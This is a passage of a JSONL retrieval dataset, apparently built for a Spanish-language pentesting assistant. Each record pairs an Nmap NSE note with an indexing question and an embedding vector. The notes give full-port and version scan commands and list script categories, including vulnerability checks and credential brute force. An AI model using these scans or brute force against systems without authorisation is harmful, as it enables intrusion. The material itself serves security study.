-0.08792, 0.04118, -0.05655, -0.04381, 0.00346, 0.06149, 0.02867, -0.10234, 0.03305, 0.01175, -0.08619, -0.10175, -0.05802, -0.09799, -0.07677, 0.00015, 0.12431, -0.05245, 0.00571, 0.07643, 0.02802, -0.08758, 0.09129, -0.00725, 0.10257, 0.00479, 0.02348, -0.00873, -0.10674, 0.10218, -0.03641, 0.0546, -0.0103, 0.03045, -0.0226, -0.08984, 0.03028, 0.1001, -0.03497, -0.01577, 0.00709, -0.04066, -0.04854, -0.07354, -0.01607, -0.09811, -0.11575, -0.01173, -0.13171, -0.02622, 0.02543, -0.04111, 0.05778, -0.07949, -0.02425, 0.10648, -0.0373, -0.00864, -0.0709, -0.04459, -0.12653, -0.0206, 0.06594, 0.028, -0.08207, 0.03521, 0.11381, 0.0215, 0.13367, 0.02574, 0.03757, -0.02733, -0.09196, 0.00467, -0.01314, 0.0378, -0.09943, 0.07022, 0.02781, 0.16157, -0.03711, -0.04578, 0.02549, -0.04017, -0.02378, 0.10693, 0.02237, -0.0376, -0.07084, 0.07029, 0.01482, -0.00237, -0.03701, -0.06241, -0.07829, 0.01955, -0.01854, 0.05053, 0.03503, -0.04933, 0.0075, -0.02344, -0.02526, -0.13727, -0.01003, -0.0576, 0.00141, 0.00901, -0.07251, -0.00727, 0.06719, -0.04864, 0.02583, 6e-05, 0.07269, -0.01066, 0.00625, 0.05869, -0.13022, -0.02984, -0.02446, -0.01458, -0.03067, -0.05228, -0.02466, 0.00086, -0.11088, -0.00409, 0.0251, -0.07822, 0.01556, 0.05783, -0.01835, -0.00148, -0.02774, -0.01988, 0.06467, -0.01486, 0.08633, -0.02911, -0.05403, 0.0182, 0.05761, 0.02765, -0.0227, -0.04425, 0.03032, 0.01491, 0.02142, -0.07582, -0.09598, 0.00342, 0.04088, 0.03409, -0.00797, 0.04377, 0.00931, 0.00206, -0.019, -0.00451, 0.00842, -0.01888, -0.03864, -0.02554, -0.01481, -0.12776, -0.03006, 0.04946, -0.02203, -0.07754, -0.04668, 0.01437, -0.03485, -0.02123, 0.0779, -0.02272, 0.00403, 0.03302, 0.03805, -0.05979, 0.09303, 0.01795]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El comando que usas siempre\n```bash\nsudo nmap -sCV -p- IP # -sCV = -sC (scripts default) + -sV (versiΓ³n)", "indexar": "ΒΏHay algΓΊn programa para hacer escaneos de puertos completos?", "v": [0.02636, 0.02189, -0.10357, 0.06583, 0.04108, -0.15234, 0.18897, -0.20283, -0.11043, -0.06209, -0.09592, 0.15021, 0.04695, -0.01438, 0.00595, -0.03635, 0.10002, -0.0136, 0.08848, 0.10192, -0.12428, 0.02938, -0.07619, -0.01774, 0.01559, -0.06685, 0.00065, 0.07901, -0.08809, 0.01091, 0.05322, 0.12692, 0.04074, -0.04259, 0.06768, -0.09965, 0.11308, -0.06145, 0.08105, 0.00819, 0.07653, -0.00587, -0.06267, -0.11122, 0.08852, -0.07624, -0.04128, -0.02207, 0.03846, -0.07803, 0.00143, 0.04478, -0.05942, -0.0237, 0.03488, -0.09463, -0.04219, 0.00408, -0.05474, -0.0696, 0.01403, 0.10296, 0.08227, -0.09483, -0.03092, -0.08168, 0.0355, 0.05196, -0.0072, 0.066, -0.12502, 0.03833, 0.04607, 0.06139, -0.05752, -0.06839, -0.02742, 0.00874, 0.00012, 0.08789, 0.00852, -0.03024, -0.02715, -0.02543, -0.07064, 0.0042, -0.11944, -0.04359, 0.02302, -0.08584, 0.06505, 0.02315, -0.03836, 0.09077, 0.00589, -0.02463, 0.09828, 0.08995, -0.03641, 0.08339, 0.02449, -0.01104, -0.01228, 0.10541, -0.11406, 0.09551, 0.03296, -0.0554, 0.0126, 0.12155, 0.06834, 0.06121, 0.01378, -0.03834, -0.12967, 0.02402, -0.01088, -0.03835, 0.04742, -0.00251, -0.10676, 0.00908, -0.06254, 0.01628, 0.05762, 0.02288, -0.00311, 0.12421, 0.00357, 0.109, -0.00338, -0.00455, -0.05452, -0.13239, -0.11113, -0.0792, 0.03665, -0.08973, -0.02899, -0.05996, -0.10021, 0.09653, 0.03021, 0.0553, -0.01084, 0.04614, -0.01414, -0.03429, -0.02294, -0.01059, 0.06512, 0.1038, -0.10492, 0.03994, -0.04067, 0.00215, 0.16084, 0.03083, -0.04755, 0.04933, -0.04161, 0.05921, -0.01911, -0.03697, 0.06833, -0.08259, 0.00895, 0.01332, -0.02461, 0.04109, -0.04134, 0.07662, -0.03479, -0.11211, 0.04342, 0.03252, 0.00155, -0.07522, 0.01076, -0.01782, -0.05571, 0.08498, 0.03395, -0.0284, -0.01712, -0.06486, -0.01412, -0.00414, -0.00592, 0.0359, -0.00226, -0.02054, -0.06389, -0.0374, -0.00191, 0.06646, 0.01767, 0.04116, 0.05487, -0.02301, 0.00329, 0.0047, 0.06156, 0.01377, 0.03373, 0.09192, -0.0483, -0.04172, 0.05392, 0.09803, -0.01489, -0.0658, 0.02865, 0.02067, -0.05154, -0.00392, 0.00819, 0.07721, 0.09912, 0.08326, -0.08012, 0.05603, -0.01019, 0.10577, 0.04386, -0.0106, 0.0523, 0.02616, 0.00473, 0.05315, 0.02231, -0.0297, -0.01415, -0.01425, 0.01664, -0.00191, 1e-05, -0.03909, -0.01423, -0.05728, -0.00781, -0.02132, 0.03401, -0.01202, 0.00849, -0.02454, 0.01107, 0.01757, 0.00343, 0.05374, -0.01686, 0.01669, -0.03444, -0.07509, 0.07061, 0.01704]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## El comando que usas siempre\n```bash\nsudo nmap -sCV -p- IP # -sCV = -sC (scripts default) + -sV (versiΓ³n)", "indexar": "ΒΏQuΓ© herramienta sirve para detectar la versiΓ³n del servicio en los puertos?", "v": [-0.02818, 0.02248, -0.14525, -0.22071, 0.07528, -0.18926, 0.04448, -0.12028, 0.05018, -0.10837, -0.11707, -0.00573, -0.02494, -0.09215, 0.0832, -0.01985, 0.06529, -0.11848, 0.04603, -0.00262, -0.03246, -0.00995, -0.06348, -0.06114, -0.09052, 0.04693, 0.0798, -0.1011, -0.18677, 0.05191, -0.01659, -0.06925, 0.06897, -0.02064, -0.08344, -0.13759, -0.02422, 0.00301, 0.05344, 0.11449, 0.09449, 0.001, 0.0087, 0.00027, 0.08519, -0.04113, -0.05907, -0.01757, 0.05824, 0.11348, -0.0365, -0.03649, -0.11923, 0.03987, -0.06366, -0.05957, 0.09418, -0.0487, 0.05559, -0.17094, -0.10802, 0.01447, -0.07661, -0.08854, 0.02105, -0.13846, -0.08116, -0.00313, -0.07343, -0.01044, -0.10206, -0.01353, 0.11667, 0.07973, -0.08523, -0.01923, -0.00268, 0.02454, 0.07392, 0.00354, 0.12184, 0.02491, -0.05473, -0.01245, -0.03111, -0.06245, -0.02295, -0.0052, 0.06094, -0.16257, 0.02177, 0.10616, 0.00226, 0.11468, -0.01719, -0.0349, 0.0796, -0.05367, -0.00194, -0.00384, 0.16788, -0.05552, -0.04854, 0.08553, -0.06126, -0.02764, 0.00413, -0.06256, -0.06015, -0.02756, 0.09951, -0.01255, 0.01946, -0.00405, -0.01034, 0.0577, 0.02396, -0.08714, -0.02988, 0.02268, -0.0262, -0.00622, -0.0361, -0.06439, 0.0151, -0.03777, -0.0374, 0.11014, 0.05408, -0.06666, 0.03747, -0.05553, -0.08726, -0.03147, -0.06729, -0.02638, 0.08083, -0.1527, -0.05802, -0.02493, -0.02121, 0.08885, -0.0581, -0.04245, 0.05407, 0.02133, 0.03313, -0.01263, -0.05051, -0.00688, 0.02492, -0.02522, -0.07948, 0.03072, -0.06645, -0.00486, 0.0417, -0.03614, -0.13671, 0.06511, -0.02082, -0.06007, 0.02925, -0.01618, 0.03436, -0.05102, 0.04724, 0.04552, 0.11385, 0.01741, 0.00322, 0.02561, 0.00814, -0.06957, -0.00218, -0.00831, -0.07288, -0.00494, -0.01533, -0.04012, -0.05122, 0.00211, -0.05118, -0.06665, -0.02323, -0.06918, 0.01286, -0.08233, -0.0293, 0.03769, 0.03682, -0.01252, -0.02107, -0.05844, 0.0486, 0.00805, 0.01367, -0.03165, 0.03534, -0.01242, -0.04166, -0.03025, -0.01439, -0.00754, 0.02882, 0.09456, -0.02028, 0.05103, 0.02221, 0.05786, -0.02796, 0.02386, 0.04794, -0.01631, -0.0357, -0.01038, -0.00184, 0.04052, 0.02843, 0.05359, -0.05749, -0.00981, -0.00239, 0.01685, -0.00754, 0.01886, 0.06972, 0.01702, 0.04602, 0.03442, 0.08155, 0.01644, -0.03116, -0.02403, -0.01284, -0.06893, 0.03071, -0.00896, -0.04631, -0.09073, 0.01431, 0.02521, 0.02324, -0.02909, 0.01065, -0.04537, 0.03185, -0.01603, -0.01813, -0.03492, -0.05104, 0.045, 0.0691, -0.06118, 0.03411, -0.00704]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# patrΓ³n real de tu history_contabo.txt:\nnmap IP -p- -Pn --min-rate 5000 -vvv -n --open # rΓ‘pido todos los puertos\nnmap -p- localhost -sCV # luego versiΓ³n+scripts sobre lo abierto\n```\nFlujo tΓ­pico: 1) `-p- --open` rΓ‘pido para ver QUΓ‰ abre β†’ 2) `-sCV` dirigido a esos puertos.", "indexar": "que programa hay que usar para hacer un escaneo completo de puertos y luego verificar versiones?", "v": [-0.0177, 0.01666, -0.28566, -0.02302, 0.06892, -0.08414, 0.16507, -0.19475, -0.09247, -0.16088, -0.08716, 0.00443, -0.02256, -0.06349, -0.01523, -0.05349, 0.02716, -0.076, 0.09209, 0.12845, -0.01374, -0.06375, -0.02235, -0.05404, -0.08572, 0.14924, -0.04425, -0.01832, -0.06284, -0.02266, 0.02028, 0.07923, 0.08328, -0.07601, -0.03083, -0.07237, 0.10798, -0.11776, 0.06493, 0.08113, 0.06336, 0.0861, -0.04565, -0.05105, 0.0648, -0.0753, 0.00577, -0.01922, -0.01638, -0.04636, 0.00324, 0.07003, -0.09158, 0.05118, -0.03464, -0.12017, 0.04511, -0.02932, -0.02381, -0.0765, -0.0597, 0.05946, 0.05676, -0.00184, -0.06372, -0.03292, 0.02333, 0.04142, -0.06544, 0.05214, -0.10034, 0.10077, 0.08595, 0.02218, -0.10432, -0.07783, -0.02314, -0.02251, 0.04769, 0.00881, -0.00808, -0.00987, -0.03301, 0.01154, -0.11654, -0.06768, -0.00698, -0.06575, 0.00363, -0.0853, 0.01103, -0.00493, -0.0059, 0.08715, 0.02787, -0.05069, 0.08827, 0.06083, 0.02827, 0.10821, 0.13912, -0.07016, -0.042, 0.11055, -0.05192, 0.0403, 0.06299, -0.08817, -0.03112, 0.05661, 0.03144, 0.02153, -0.0935, -0.08026, -0.04522, 0.01474, -0.02294, -0.12682, 0.01009, -0.01772, -0.07562, -0.00798, -0.07364, -0.00878, 0.05501, 0.00963, 0.00215, 0.1108, 0.00657, 0.06427, 0.03163, -0.05391, -0.1052, -0.07954, -0.10863, -0.07715, 0.02019, -0.09029, 0.01271, -0.04644, -0.05945, 0.1184, -0.00308, 0.02241, 0.03428, 0.0652, -0.058, -0.03208, -0.06697, 0.02343, 0.05326, 0.02858, -0.0777, 0.08663, -0.06161, -0.03742, 0.09205, -0.03563, -0.01026, 0.07338, 0.00721, 0.00104, -0.02271, -0.01562, 0.07695, -0.08164, -0.02788, 0.01521, 0.02918, 0.00528, -0.00599, 0.11116, -0.01194, -0.10463, 0.03068, -0.00762, -0.01652, -0.04878, -0.03653, -0.01907, -0.0993, 0.07477, -0.01304, -0.01072, -0.04569, -0.05998, -0.02084, 0.01233, -0.01234, 0.03875, 0.02748, 0.07882, -0.00051, 0.02511, -0.00829, 0.0473, 0.01438, 0.02349, 0.03135, -0.0237, -0.09171, 0.00311, -0.04701, -0.08041, 0.08091, 0.0569, -0.07503, 0.00916, 0.06055, 0.0957, 0.00829, -0.02018, 0.02518, -0.00371, -0.03674, -0.01476, -0.02546, 0.04918, 0.03502, 0.05455, -0.03025, 0.03318, -0.01927, 0.04983, -0.00971, -0.00589, 0.06826, 0.03951, 0.01931, 0.07926, 0.00146, 0.02041, -0.0357, -0.03904, 0.01653, 0.01792, 0.03899, 0.01371, -0.02652, -0.12077, -0.00054, 0.05317, 0.01543, -0.03185, -0.01962, -0.04243, -0.05349, 0.04364, 0.00956, -0.01083, -0.01529, 0.04471, 0.02094, -0.08788, 0.03906, -0.0316]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# patrΓ³n real de tu history_contabo.txt:\nnmap IP -p- -Pn --min-rate 5000 -vvv -n --open # rΓ‘pido todos los puertos\nnmap -p- localhost -sCV # luego versiΓ³n+scripts sobre lo abierto\n```\nFlujo tΓ­pico: 1) `-p- --open` rΓ‘pido para ver QUΓ‰ abre β†’ 2) `-sCV` dirigido a esos puertos.", "indexar": "con quΓ© herramienta puedo encontrar rΓ‘pidamente todos los puertos abiertos en una IP?", "v": [0.0665, 0.08481, -0.20398, -0.09212, 0.05687, -0.18736, 0.09069, -0.07764, -0.1595, -0.08935, 0.02675, 0.02841, 0.05709, -0.05006, -0.00396, 0.05359, 0.04215, -0.06589, 0.03197, -0.07365, -0.08088, 0.0621, -0.18892, -0.06786, -0.0093, 0.03031, -0.02525, 0.09121, -0.20479, -0.03954, -0.13015, -0.02149, 0.02226, 0.01539, -0.14744, -0.20326, 0.09625, 0.14079, 0.04819, 0.01084, 0.06447, 0.04846, -0.05333, -0.02439, 0.10324, 0.00922, -0.0282, -0.07343, 0.0217, 0.00028, -0.12186, -0.20411, -0.05862, -0.06675, -0.07962, -0.03065, 0.134, 0.00842, 0.00551, -0.10463, -0.12314, 0.11176, -0.07196, -0.10019, -0.01283, -0.09126, -0.03237, 0.0487, -0.08209, 0.00078, -0.04072, -0.05202, -0.03234, 0.10527, 0.02321, -0.00179, -0.03492, 0.02443, 0.03719, 0.06142, 0.08041, 0.03401, -0.03831, -0.08997, -0.04206, -0.08513, -0.00207, -0.11672, 0.03821, -0.12697, 0.04027, 0.05005, -0.03064, 0.10831, -0.04062, 0.01517, 0.02387, 0.0442, -0.06491, 0.00185, 0.06865, 0.04154, -0.1453, 0.05964, 0.00988, 0.01057, -0.00473, -0.01042, 0.00753, 0.04117, 0.07267, 0.02608, 0.04385, -0.03551, 0.00577, 0.03522, -0.0293, -0.11525, -0.03544, -0.00537, 0.03286, -0.03855, -0.06, -0.00197, -0.00661, 0.0172, -0.00055, 0.1118, 0.02539, -0.02767, 0.05442, -0.06852, -0.11083, -0.02392, 0.03194, -0.06567, -0.00568, -0.12088, 0.01234, -0.02959, -0.04313, -0.03367, -0.00988, -0.09021, 0.05428, -0.07413, -0.02603, -0.04075, -0.06649, -0.05488, 0.01949, 0.01063, 0.00025, 0.00753, -0.07965, 0.07577, 0.0511, -0.00673, -0.05864, 0.0243, -0.05829, -0.00558, -0.00593, -0.02576, 0.05576, -0.03594, -0.04701, 0.04417, 0.0565, -0.012, 0.01766, 0.07995, -0.00068, -0.05024, -0.01479, -0.05251, -0.05493, -0.02801, -0.05202, -0.07892, -0.03711, 0.00954, -0.06076, -0.05022, -0.03109, -0.08085, 0.08019, -0.0677, -0.01163, 0.07596, 0.05013, 0.01421, -0.01926, -0.02374, -0.01521, -0.00931, 0.00115, -0.02987, -0.01765, -0.05045, -0.01659, -0.01602, -0.00442, -0.0479, 0.01456, 0.04391, -0.06963, 0.0132, -0.00306, 0.0488, 0.00414, -0.00261, 0.0732, -0.02966, -0.03113, 0.03494, -0.02988, 0.05441, 0.02572, 0.01173, 0.01227, 0.03387, -0.0148, 0.00235, 0.01022, 0.0113, 0.0095, 0.02778, 0.02633, 0.03832, 0.01602, -0.01904, -0.05069, -0.04284, 0.01322, -0.03571, -0.01512, -0.02026, -0.02396, 0.02506, -0.00836, 0.00012, 0.03434, -0.03586, 0.01238, -0.05472, -0.01684, 0.01827, -0.02181, -0.08777, -0.08763, 0.03912, 0.04133, -0.03768, 0.00234, -0.01803]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# patrΓ³n real de tu history_contabo.txt:\nnmap IP -p- -Pn --min-rate 5000 -vvv -n --open # rΓ‘pido todos los puertos\nnmap -p- localhost -sCV # luego versiΓ³n+scripts sobre lo abierto\n```\nFlujo tΓ­pico: 1) `-p- --open` rΓ‘pido para ver QUΓ‰ abre β†’ 2) `-sCV` dirigido a esos puertos.", "indexar": "cual es el flujo correcto para escanear puertos sin respuesta y luego probar scripts?", "v": [0.09941, -0.04508, -0.2487, 0.00031, 0.05324, -0.19585, 0.14493, -0.17838, -0.06281, -0.04719, -0.0907, 0.12106, 0.04906, -0.08149, 0.00588, -0.07809, 0.03571, 0.01612, 0.0255, 0.05919, -0.06655, -0.13033, -0.0557, -0.10323, -0.04207, 0.02678, -0.00563, 0.092, -0.06899, -0.04943, 0.02569, 0.10704, 0.20772, -0.02672, 0.0047, 0.00712, 0.03573, 0.03385, 0.06791, 0.23363, -0.00135, -0.00882, -0.09993, -0.05818, -0.0776, -0.07826, 0.01598, -0.00799, 0.03717, -0.0486, 0.02209, 0.0075, -0.05609, 0.03634, -0.13185, -0.00417, 0.0725, -0.08006, 0.00521, -0.02714, 0.04024, 0.01593, 0.08592, -0.04582, -0.05584, -0.05984, 0.04799, -0.00672, -0.10206, 0.03586, -0.06455, 0.11753, -0.04097, 0.09196, -0.01022, -0.01645, -0.06899, 0.02991, 0.04156, 0.16186, -0.01382, -0.05384, -0.05529, -0.03961, -0.03684, -0.12507, -0.12739, -0.06588, -0.04428, -0.06157, 0.03513, -0.06887, 0.03807, 0.06975, 0.02154, -0.10923, 0.05639, 0.05424, 0.02222, 0.00999, 0.00269, -0.01912, -0.09382, 0.11374, -0.00866, 0.08557, 0.06927, -0.09075, 0.033, -0.01333, 0.03116, 0.06989, 0.00226, -0.00929, -0.0067, 0.01868, -0.0255, -0.08616, 0.01299, 0.02593, -0.08337, -0.06411, -0.08772, -0.035, 0.00503, -0.03374, 0.06971, -0.00255, 0.06723, 0.0179, -0.0605, -0.03807, -0.07647, -0.06416, -0.05463, 0.02367, 0.07536, -0.04519, -0.00963, -0.04987, 0.0288, 0.06258, 0.00087, 0.07339, 0.03176, 0.02052, 0.00352, -0.09118, -0.07979, -0.03816, -0.0451, 0.04631, -0.0101, 0.081, -0.06939, -0.01466, 0.07737, -0.00946, -0.09085, 0.03944, 0.00085, -0.01476, 0.00764, 0.04384, 0.07574, -0.0803, -0.11077, -0.01397, 0.03569, 0.00991, 0.02173, 0.07408, -0.07134, -0.0735, 0.0182, -0.00747, -0.01054, -0.07923, -0.05342, -0.00483, -0.01292, 0.05589, -0.05443, -0.01117, -0.03635, -0.08139, -0.00848, -0.01783, -0.01061, 0.12714, 0.04639, 0.01978, -0.03971, -0.04349, -0.03648, -0.00545, 0.01312, -0.04349, -0.0275, -0.02404, -0.01909, 0.07135, -0.01105, -0.06406, 0.02586, 0.04085, -0.06165, 0.00843, -0.01466, -0.00283, 0.03632, 0.01532, 0.0438, -0.02205, -0.02636, -0.02386, -0.00124, 0.05984, 0.02118, 0.03465, -0.01581, 0.01108, 0.01899, -0.03507, -0.06811, 0.03578, 0.08316, 0.03597, -0.02861, 0.05648, 0.01621, 0.02963, -0.09999, -0.02341, 0.0217, 0.06462, 0.02216, 0.00391, -0.00654, -0.08194, 0.04227, 0.03476, -0.01184, -0.08221, 0.01084, -0.03004, -0.04673, -0.00812, -0.01413, -0.00631, -0.00136, 0.06003, 0.00725, -0.03574, 0.07913, -0.03008]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## CategorΓ­as de scripts\n```\ndefault (-sC) los seguros y ΓΊtiles por defecto\nvuln comprueba vulnerabilidades conocidas\nsafe / auth no intrusivos / temas de autenticaciΓ³n\nbrute fuerza bruta de credenciales\ndiscovery enumeraciΓ³n (snmp, smb, http...)\n```", "indexar": "que herramienta puedo usar para hacer una fuerza bruta con contraseΓ±as?", "v": [0.10453, 0.03301, -0.22695, -0.15026, -0.04525, 0.01185, -0.03683, -0.04585, -0.02821, -0.11967, -0.10153, 0.04924, -0.04703, 0.04801, -0.0491, -0.03675, 0.03275, -0.09334, -0.08913, 0.00492, 0.00041, -0.12038, -0.04939, -0.04974, -0.11087, -0.03297, 0.03556, 0.06509, -0.1924, -0.00041, -0.01389, 0.10776, 0.14753, -0.04878, -0.04584, 0.03904, -0.05267, 0.08761, 0.11826, 0.10174, -0.00573, 0.12051, -0.13191, 0.05633, -0.01827, 0.0798, -0.0415, 0.01926, -0.00831, 0.07712, -0.11342, -0.18504, -0.11415, -0.07707, -0.07228, -0.20525, 0.17456, -0.09058, -0.11232, -0.02146, -0.12247, 0.06036, -0.03398, 0.04323, -0.1029, -0.06254, 0.00995, -0.06123, -0.09278, 0.06836, -0.08303, -0.02264, -0.05666, 0.01879, -0.01904, 0.02695, 0.03091, -0.00032, 0.00388, 0.05008, -0.09517, 0.00314, -0.07765, -0.04462, -0.12892, -0.05723, 0.12143, -0.05194, 0.03893, -0.09245, 0.01482, 0.01887, 0.00455, -0.00586, 0.00939, -0.012, -0.02264, 0.02274, -0.05109, -0.08301, 0.07183, -0.05887, -0.00945, 0.03727, 0.04659, -0.07138, -0.03954, 0.01222, -0.03981, 0.00303, 0.03851, -0.00862, -0.06938, -0.0013, -0.03863, 0.05535, -0.07517, -0.14214, -0.00702, -0.02866, 0.00403, -0.00854, -0.0437, 0.0165, 0.02511, 0.07254, 0.02606, 0.0738, -0.05108, -0.146, 0.01742, -0.02604, -0.02747, -0.00292, -0.00012, 0.01001, 0.03101, -0.16398, -0.04308, -0.07046, -0.00812, 0.01637, -0.00773, -0.095, 0.0646, 0.06869, -0.00143, -0.02498, -0.05658, -0.01006, 0.08978, -0.05285, 0.02949, 0.06194, -0.04643, 0.01683, 0.021, -0.06594, -0.09917, 0.06203, -0.05959, -0.08432, -0.06582, 0.00729, -0.02279, -0.02623, -0.02071, 0.02879, 0.01526, 0.03326, 0.03593, 0.02241, 0.07966, 0.01999, 0.03901, -0.07855, -0.04555, 0.01487, -0.03796, -0.06898, 0.00842, -0.00914, -0.05686, -0.01498, 0.04399, -0.02069, 0.09733, -0.01639, -0.01997, 0.00975, -0.00796, 0.06983, 0.0021, 0.02634, 0.00368, -0.01582, -0.01502, -0.01372, 0.00523, -0.0363, -0.00162, -0.03111, -0.02789, -0.06805, 0.06516, 0.03476, -0.05112, -0.03492, -0.01542, 0.01048, 0.02481, -0.01342, 0.02802, -0.0703, -0.06572, -0.0387, -0.05357, 0.03697, -0.0244, -0.03559, 0.0157, 0.06318, 0.02615, 0.03771, 0.01622, 0.01748, 0.01892, -0.03532, 0.01579, 0.03753, 0.01718, -0.01721, -0.02892, -0.00225, 0.02911, -0.0317, -0.01684, -0.02305, -0.08268, 0.00546, -0.0408, 0.06465, 0.02477, -0.03678, -0.08253, -0.01046, -0.02892, -0.01214, -0.04035, -0.04508, -0.02045, 0.02336, 0.09295, -0.02064, -0.00129, -0.02566]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## CategorΓ­as de scripts\n```\ndefault (-sC) los seguros y ΓΊtiles por defecto\nvuln comprueba vulnerabilidades conocidas\nsafe / auth no intrusivos / temas de autenticaciΓ³n\nbrute fuerza bruta de credenciales\ndiscovery enumeraciΓ³n (snmp, smb, http...)\n```", "indexar": "quΓ© programa me sirve para escanear vulnerabilidades conocidas en mi red?", "v": [0.07896, 0.05396, -0.17939, -0.03286, 0.04636, -0.06843, -0.09917, -0.18864, -0.02105, -0.09399, -0.04263, -0.10994, -0.02166, -0.12007, 0.07544, 0.08369, 0.01089, -0.05679, 0.16512, 0.08074, 0.00209, -0.03429, 0.00469, -0.02776, -0.09762, 0.10426, 0.02024, 0.01394, 0.02325, -0.00233, 0.01217, 0.06264, 0.03573, -0.07738, -0.06447, 0.14795, 0.08788, -0.07728, 0.00553, 0.04951, 0.02734, -0.07008, -0.00814, -0.06705, 0.10777, -0.0533, -0.09523, 0.01046, -0.04536, 0.01136, -0.10278, 0.0039, -0.10011, -0.00867, 0.00663, -0.11439, -0.05023, 0.00906, -0.10878, 0.12544, -0.04852, 0.00041, 0.09091, -0.00983, 0.05187, -0.05949, 0.02999, 0.03752, -0.11247, 0.09635, -0.01576, 0.08641, -0.00312, -0.03273, 0.0066, -0.01415, 0.00815, -0.00679, 0.06304, -0.03015, 0.05874, 0.05387, -0.02576, 0.11706, -0.05387, -0.01397, 0.06483, -0.08501, 0.02832, -0.01153, 0.10425, 0.04408, -0.01763, 0.08728, 0.10035, -0.03506, 0.14537, 0.03232, -0.07694, 0.01491, -0.05757, -0.03937, -0.07424, 0.06382, 0.02369, 0.10008, 0.01677, -0.04582, -0.0032, 0.00421, -0.03456, 0.01506, -0.07295, -0.05381, -0.06723, 0.0914, -0.00788, 0.00456, 0.07819, 0.02287, -0.11749, -0.03115, -0.0698, -0.03593, 0.07366, -0.01671, -0.01332, 0.04483, -0.02251, 0.02289, -0.02754, -0.04438, -0.00722, -0.0377, -0.01844, -0.00208, 0.03487, -0.07918, -0.00325, -0.05567, 0.03187, 0.06715, -0.07832, 0.02756, -0.05825, 0.1177, 0.11921, -0.12559, 0.00973, 0.05416, -0.00446, -0.02204, -0.08692, 0.04592, -0.04251, 0.00136, 0.03684, -0.02363, -0.05721, 0.10376, -0.07364, 0.0239, -0.02205, -0.00725, 0.04528, -0.02116, 0.0575, 0.02219, 0.1293, 0.11506, -0.00062, 0.12107, 0.01689, -0.05709, -0.00509, -0.0869, 0.00428, -0.10283, 0.00896, -0.04311, -0.03679, 0.02122, 0.04999, 0.04374, 0.01558, -0.02344, -0.01481, 0.01903, 0.04884, -0.00854, -0.05012, -0.08579, 0.02736, -0.04921, 0.01375, 0.02629, -0.01738, -0.01692, 0.02162, -0.04874, -0.09183, -0.00271, -0.04512, -0.0155, 0.12797, 0.09864, 0.00819, -0.03969, 0.02577, 0.16069, 0.02432, 0.02557, 0.07988, 0.03676, -5e-05, -0.04922, 0.06697, 0.08078, 0.04917, -0.03478, 0.01003, -0.03028, 0.05648, 0.08462, -0.05402, -0.03139, -0.01448, -0.05439, 0.01937, -0.01234, 0.02569, -0.06681, -0.08565, -0.08177, 0.01544, -0.08308, -0.00168, -0.01584, -0.04276, -0.06732, 0.02529, 0.04049, -0.04734, -0.09953, 0.02641, -0.03635, -0.0239, -0.00355, -0.02058, 0.00815, -0.09133, 0.04673, 0.00807, -0.11204, 0.05573, -0.03448]} +{"tipo": "pregunta", "herramienta": "Nmap NSE", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/Nmap NSE.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## CategorΓ­as de scripts\n```\ndefault (-sC) los seguros y ΓΊtiles por defecto\nvuln comprueba vulnerabilidades conocidas\nsafe / auth no intrusivos / temas de autenticaciΓ³n\nbrute fuerza bruta de credenciales\ndiscovery enumeraciΓ³n (snmp, smb, http...)\n```", "indexar": "con quΓ© script puedo enumerar servicios como SNMP o SMB sin ser intrusivo?", "v": [-0.13682, -0.06848, -0.19621, -0.01764, -0.08515, -0.17674, -0.28565, -0.18126, -0.14847, 0.03226, -0.1582, 0.05884, 0.22111, -0.2632, -0.05814, 0.21546, -0.07257, -0.21558, 0.0667, 0.12877, -0.0415, 0.02656, 0.07208, -0.03253, -0.08927, -0.012, -0.02614, 0.07037, -0.0309, -0.01944, -0.03656, -0.00747, 0.04598, -0.06011, -0.0565, -0.06057, -0.0241, 0.1006, 0.0343, 0.14402, 0.03429, -0.08347, -0.03269, 0.01841, 0.02254, -0.06818, 0.01614, 0.0355, 0.0125, 0.02881, -0.05963, 0.03858, -0.10333, -0.04926, -0.09837, 0.04636, -0.0212, -0.09697, 0.00913, 0.02766, -0.02282, 0.05455, -0.01353, 0.00475, 0.06437, -0.08664, 0.00417, -0.04985, 0.05125, -0.02799, -0.06143, -0.02412, 0.02572, -0.05229, 0.02957, 0.04026, -0.08995, -0.03317, 0.07676, 0.06391, -0.00668, -0.05694, -0.07443, -0.01667, 0.00414, -0.05236, 0.01233, -0.03261, -0.05259, -0.03996, 0.06927, 0.10567, 0.0061, 0.06792, -0.02611, -0.01188, 0.01019, -0.03622, 0.08741, -0.03615, 0.03629, 0.04743, -0.1488, 0.08215, -0.03371, 0.02201, 0.10297, 0.03011, 0.02117, -0.10514, 0.01205, 0.03455, -0.02296, -0.01443, -0.01165, -0.07211, -0.10326, -0.00752, 0.04751, -0.05944, -0.01348, -0.02867, -0.03539, 0.02562, -0.02706, -0.05277, 0.03317, -0.02224, 0.02896, -0.00348, -0.05506, -0.01406, -0.02828, -0.05271, 0.00904, -0.06588, -0.00498, -0.00522, -0.0188, 0.018, 0.06119, -0.02214, 0.04074, 0.03225, -0.02782, -0.04385, -0.03563, -0.05315, -0.02516, -0.00177, 